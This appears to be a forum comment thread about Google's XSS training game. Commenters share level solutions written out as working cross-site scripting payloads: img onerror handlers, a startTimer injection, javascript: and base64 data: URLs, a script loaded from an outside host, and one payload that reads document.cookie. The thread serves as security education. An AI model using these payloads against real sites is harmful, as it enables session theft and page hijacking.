Google's XSS game
xss-game.appspot.com
xss-game.appspot.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_She...
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_P...
If my site will only ever allow users to see their own submitted data, and never ever data another user has submitted (i.e. no general 'posts' etc) - then is there actually a XSS risk on my site?
So I'm curious if an attacker can gain anything by looking at their own XSS attack?
There are other defenses against that, like having HttpOnly set on your cookies. Once you decide to let one particular thing through, though, you've lost defense in depth.
Persistent attacks are generally considered to be more dangerous, but reflected attacks are still quite bad.
That said, there is still no excuse to trust user input. Always protect against XSS like you always protect against SQL injection.
The best part is the hints, too many of these sites have points where I go "Oh, well I don't know how to do this, and I don't see how I could figured it out, so I guess I'll just leave"
I tried it a while back and enjoyed it quite a bit. I forget if I completely finished it or not, but it was educational.
https://www.google.com/about/appsecurity/learning/xss/index....
e.g. "Now, enter <img src='' onerror="alert(document.cookie);" and hit 'Share status!'."
One of the reasons for using such broken payloads is to demonstrate that browsers will happily parse broken markup and that approaches such as removing "<.*>" won't be effective as a technique to prevent XSS (because such a regexp won't match an unterminated tag like the example you pointed out).
Still, it could at least use a better explanation. The documentation fairy will take a look!
That's what the computer said LAST time. But I'm still alive... ;)
[0] http://www.paulirish.com/2010/the-protocol-relative-url/
[blocked] The page at 'xss-game' was loaded over HTTPS, but ran insecure content from 'script-url': this content should also be loaded over HTTPS.
PS. Consider it reported, thanks!
Help!
startTimer('');foo();//');
The remaining '); can be commented out in order to not create any syntax errors.I used this: 1'* alert()* '
(without the spaces needed for markdown here)
worked for me.
3') + alert('
Perhaps disabling it is part of the game.
SPOILER: I used the " html += "<img src='/static/level3/cloud" + num + ".jpg' />"; " untrusted injection, but after reading the hints it seems to be suggesting window.location and the postmessage to parent stuff.
Checking our stuff for this mistake now ...
EDIT: no, it doesn't :D
https://xss-game.appspot.com/level4/frame?timer=3')%3balert(...
(unless I was doing it wrong)
<img src='invalid_link.png' onerror="this.src='alert(1);'">
<img src="foo" onMouseOver="alert(33);"
Interesting to see so many people used onError instead.I'm sure that's where most people are getting it from.
As before, using <script> ... as a payload won't work
because the browser won't execute scripts added after the
page has loaded.
How do you solve level 3?This is the URL I used:
https://xss-game.appspot.com/level3/frame#'><script>alert('bla')</script>
But the hint is hinting at something more like this, I think: https://xss-game.appspot.com/level3/frame#' onerror="alert('bla')">
Can somebody explain why the first one worked? Are they wrong when they say that the browser won't execute scripts added after the page has loaded?the src opens with a single quote and looks for the 'num' var. So instead of num in the URL, you close the single quote and then close the image tag, and then run your script.
The real problem is the substring(1) function which passes the "num", instead of making sure the length is 1 it is allowing everything.
#6 looks like: https://xss-game.appspot.com/level6/frame#//rawgit.com/hhaid...
That this works is really scary if not fully surprising: data:text/javascript;base64,YWxlcnQoMTMzNyk=
Thanks jehna1 , sebslomski , all!
data:text/javascript;base64,YWxlcnQoMTMzNyk=
For #5 you can just do javascript:alert()
I.e. https://xss-game.appspot.com/level1/record allows you to go straight onto level 2.
Anywhoo, HackThisSite is similar & worth checking out (albeit it covers a wider range of web app security issues)
How can you solve level 2 ? I used next sentence, but, it don't work.
<img src=x onerror=prompt(/xD/)>
Any suggest ?